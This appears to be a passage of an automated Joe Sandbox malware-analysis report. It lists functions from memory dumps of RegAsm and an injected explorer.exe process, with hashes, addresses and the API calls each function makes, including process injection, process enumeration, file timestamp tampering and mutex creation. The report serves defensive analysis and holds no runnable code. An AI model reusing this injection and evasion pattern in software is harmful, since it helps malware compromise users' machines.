Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

Function 004018C5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Strings

zOji, xrefs: 004018C5

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID: zOji
API String ID: 4152845823-4118548424
Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

Function 004018BE Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

Function 004018C2 Relevance: 1.3, APIs: 1, Instructions: 51
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

Function 004018DA Relevance: 1.3, APIs: 1, Instructions: 43
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004018F6

Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B

Non-executed Functions

Function 0040328D Relevance: 1.4, APIs: 1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe08d82bbc0733fee536b88697db440c6f8007bf0fae6d458775501e88f8df0
Instruction ID: 2f453a045cfb1262b63684dd565d865ec58c8b50d5cef27b8d671295e507c2b2
Opcode Fuzzy Hash: 0fe08d82bbc0733fee536b88697db440c6f8007bf0fae6d458775501e88f8df0
Instruction Fuzzy Hash: 3D41242100ABD54FC7138F30497619A7F74FE53321B1940EFD880AB2A3C6399B56C7AA

Function 004022D9 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB

Function 004022D8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB

Function 004022E5 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97

Function 004022F7 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B

Function 00402321 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7

Function 004025D3 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91

Function 00402686 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.467273412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

Analysis Process: explorer.exePID: 1244, Parent PID: 3912COMMON

Execution Graph

Execution Coverage:	57.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.9%
Total number of Nodes:	156
Total number of Limit Nodes:	9

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 03F12FAC Relevance: 9.4, APIs: 6, Instructions: 360
nativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03F14760: NtCreateSection.NTDLL ref: 03F147D2

NtQueryInformationProcess.NTDLL ref: 03F131A2
NtQueryInformationProcess.NTDLL ref: 03F131CA
ReadProcessMemory.KERNEL32 ref: 03F131FD
ReadProcessMemory.KERNEL32 ref: 03F1322B
WriteProcessMemory.KERNEL32 ref: 03F132A8
CloseHandle.KERNEL32 ref: 03F132B2

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: Process$Memory$InformationQueryRead$CloseCreateHandleSectionWrite
String ID:
API String ID: 1020863039-0
Opcode ID: ced1f2898f7eb252e1f43db851a68953a6748b76824115949939d79610a37397
Instruction ID: 9292b3bb6a1c4636e74ffd062736edcdc90ac9edfe56d359946f7526a0c55a06
Opcode Fuzzy Hash: ced1f2898f7eb252e1f43db851a68953a6748b76824115949939d79610a37397
Instruction Fuzzy Hash: 52B18331A18A4D8FDB18EF58E8456A9B3F1FB98310F04427ED84AE7245DB30E9068BC5

Function 03F13BF4 Relevance: 7.6, APIs: 5, Instructions: 72
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 03F13C16
Process32First.KERNEL32 ref: 03F13C35
Process32Next.KERNEL32 ref: 03F13C80
CloseHandle.KERNEL32 ref: 03F13C8D
SleepEx.KERNEL32 ref: 03F13C98

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
String ID:
API String ID: 2482764027-0
Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
Instruction ID: c7fd90532a171c4feced2e23eb0c3d6f1dd7d753bdcac81000c548d6a21fdb10
Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
Instruction Fuzzy Hash: C0210634218A098FDB18EF64D4887AAB3E2FB88315F080B7FD44FDE194DB3495558711

Function 03F14760 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL ref: 03F147D2

Strings

@, xrefs: 03F147CA
@, xrefs: 03F147EA

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: CreateSection
String ID: @$@
API String ID: 2449625523-149943524
Opcode ID: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
Instruction ID: c014e48e48b93a65ec01f8ff7f9abe874cdc057433367bbb6b28298471b3ec4f
Opcode Fuzzy Hash: 7986f009ac0f096a0d93092820368ebc118aed73d931aaf233c3ded0dfe06134
Instruction Fuzzy Hash: 98319FB0908B498FCB94EF59D88466ABBF4FB98315F14066FE85EE3251DB70D850CB81

Function 03F15174 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32 ref: 03F151A9

Strings

%02X, xrefs: 03F15225

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: AcquireContextCrypt
String ID: %02X
API String ID: 3951991833-436463671
Opcode ID: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
Instruction ID: 992cf50a30bd94c69e7073c932513f4cfb285e922a6f938df6eaf8e2ea4c4b1d
Opcode Fuzzy Hash: 9ba93dbf62791bb373f1cafe5aeeec9cbd4ebde5fda2e8a6a364b32c22fd26f9
Instruction Fuzzy Hash: ED317C31618A4D8FCF58EF68D8886EEBBA1FB98301F000279E84EE7245DF3495419B91

Function 03F135E8 Relevance: 1.9, APIs: 1, Instructions: 412comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 03F13635

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 912310a61534bef4225d9dc8498ab8993ba0d53d59a1aa5f0c9a14fc2feab9a8
Instruction ID: c45bd0bc3677b9cadf9185765f02e8b015b1fe27939f236e861581cd8160efad
Opcode Fuzzy Hash: 912310a61534bef4225d9dc8498ab8993ba0d53d59a1aa5f0c9a14fc2feab9a8
Instruction Fuzzy Hash: 90E1EB34608A4C8FCF94EF28C895EA9B7F1FFA9305F114699E44ACB265DB70E944CB41

Function 03F13490 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 03F134E4

Part of subcall function 03F135E8: CoCreateInstance.OLE32 ref: 03F13635

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInstanceNameUser
String ID:
API String ID: 3213660374-0
Opcode ID: 9327133389d0eb1504d000c94c78cd777d249fb08f7bf16cb56fdbf05d64b918
Instruction ID: 8915a9456cbc243953612327ba1d13c5905683269e44f411bf0af479e761d6f8
Opcode Fuzzy Hash: 9327133389d0eb1504d000c94c78cd777d249fb08f7bf16cb56fdbf05d64b918
Instruction Fuzzy Hash: C7114834718B4C4FCB90EF6CA41876EB6E2FBDC200F400A2EA84EC7259DA7889558781

Function 03F119D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 299
threadmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL ref: 03F11AE7
LoadLibraryA.KERNEL32 ref: 03F11B12
CreateThread.KERNEL32 ref: 03F11CA2
CloseHandle.KERNEL32 ref: 03F11CAB
CreateThread.KERNEL32 ref: 03F11CC9

Strings

iP+, xrefs: 03F11C32
%g?, xrefs: 03F11A37

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: Create$Thread$CloseHandleHeapLibraryLoad
String ID: %g?$iP+
API String ID: 2806579993-765743493
Opcode ID: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
Instruction ID: 6c92725b2c4389b2df4c090a59db9d74be88433d18f46d53e95e8f56bf58c0dd
Opcode Fuzzy Hash: 1abdb3b54502f18c616fd6fbb0d7aa9f562b9488b5c80a3bb4ecde1b27b04ded
Instruction Fuzzy Hash: 5791C730618E0A8FCF54EF19EC826E573D6FB98301B48017D9D4ECB156DA34D961DB92

Function 03F1230C Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 505
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 03F124E9
CreateFileW.KERNEL32 ref: 03F12512
WriteFile.KERNEL32 ref: 03F12572
CloseHandle.KERNEL32 ref: 03F1257C

Strings

|:|, xrefs: 03F1242C

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: File$CloseCreateDeleteHandleWrite
String ID: |:|
API String ID: 656945655-3736120136
Opcode ID: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
Instruction ID: 31951749de4845e6eb0afbbe96793432d243860f204773f3839a2fd683936d86
Opcode Fuzzy Hash: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
Instruction Fuzzy Hash: C8E1B630718F498FD719EB68D8587AAB6D1FB98311F140A2ED49FC3281DF74E9128786

Function 03F11F04 Relevance: 7.7, APIs: 5, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32 ref: 03F11F8E
CopyFileW.KERNEL32 ref: 03F11F9D
DeleteFileW.KERNEL32 ref: 03F11FAE
DeleteFileW.KERNEL32 ref: 03F11FF9

Part of subcall function 03F14920: SetFileAttributesW.KERNEL32 ref: 03F1496F
Part of subcall function 03F14920: CreateFileW.KERNEL32 ref: 03F14999
Part of subcall function 03F14920: SetFileTime.KERNEL32 ref: 03F149C4

CreateFileW.KERNEL32 ref: 03F12085

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: File$Delete$Create$AttributesCopyTime
String ID:
API String ID: 642576546-0
Opcode ID: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
Instruction ID: 7efe76815c299a564505a13071e516dfa29de2f853b8e0618cb18f8f5c9c09a4
Opcode Fuzzy Hash: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
Instruction Fuzzy Hash: 8B414A20718B4C4FDBA8EFACA85876E72D2EBDC610F50453EA80EC7395DE349D168781

Function 03F14E00 Relevance: 6.1, APIs: 4, Instructions: 122
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32 ref: 03F14E41
RegQueryValueExA.KERNEL32 ref: 03F14E85
RegCloseKey.KERNEL32 ref: 03F14ECD
ObtainUserAgentString.URLMON ref: 03F14EEE

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: AgentCloseObtainOpenQueryStringUserValue
String ID:
API String ID: 2776781324-0
Opcode ID: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
Instruction ID: 012fe7c2dfdf3648df839b9972efaa2ab5e55f43b166bfd6912048ea3c113e5f
Opcode Fuzzy Hash: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
Instruction Fuzzy Hash: 1331A631608A4D8FDB18EF68E8496EA77E6FBD8310B00027AD85EC7245EF74D8164791

Function 03F132EC Relevance: 4.7, APIs: 3, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 03F13332
ReadFile.KERNEL32 ref: 03F13379
CloseHandle.KERNEL32 ref: 03F133AF

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
Instruction ID: 56da2dbf936c1bccd8783048851fd52a1698ce90eb7d6533d6366be8f60874ae
Opcode Fuzzy Hash: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
Instruction Fuzzy Hash: 2F41933471CF0D4FD75CEA6CA85977AB6D2EBC9211F14023EA49FC3255DE64982247C2

Function 03F11D8C Relevance: 4.6, APIs: 3, Instructions: 121
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 03F14C90: GetVolumeInformationA.KERNEL32 ref: 03F14CFD

CreateMutexExA.KERNEL32 ref: 03F11DFF
CreateFileMappingA.KERNEL32 ref: 03F11EB1
SleepEx.KERNEL32 ref: 03F11EEE

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: Create$FileInformationMappingMutexSleepVolume
String ID:
API String ID: 3744091137-0
Opcode ID: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
Instruction ID: 4ff7eafc09863aed923c2c639212565d81dae47cedd50015e136709de661f4c0
Opcode Fuzzy Hash: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
Instruction Fuzzy Hash: 63416530B14F088FDB64EB78D4587AEB6D2EB98706F144A3E805FD6240CF7595169781

Function 03F14920 Relevance: 4.6, APIs: 3, Instructions: 84
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesW.KERNEL32 ref: 03F1496F
CreateFileW.KERNEL32 ref: 03F14999
SetFileTime.KERNEL32 ref: 03F149C4

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID: File$AttributesCreateTime
String ID:
API String ID: 1986686026-0
Opcode ID: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
Instruction ID: 37a445b3252c6d1677d14d4354bab3a728fe8fe7cea6566489215b8358c4f74a
Opcode Fuzzy Hash: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
Instruction Fuzzy Hash: 4F21003071CB488FDF64EF68988879EB6E2FBDC701F10456EA85ED7245DA34DA058782

Function 03F13F7C Relevance: 3.5, APIs: 2, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
Instruction ID: 18db897856dad706a0ad8381dadaa2634454f56885d306bbf8dd8542fd81b9a3
Opcode Fuzzy Hash: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
Instruction Fuzzy Hash: 1CD17130B18B498FDB54EF69E84566EB7F2FB98701F50452DE44AD3241DF74E8128B82

Function 03F12CD0 Relevance: 3.3, APIs: 2, Instructions: 254
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
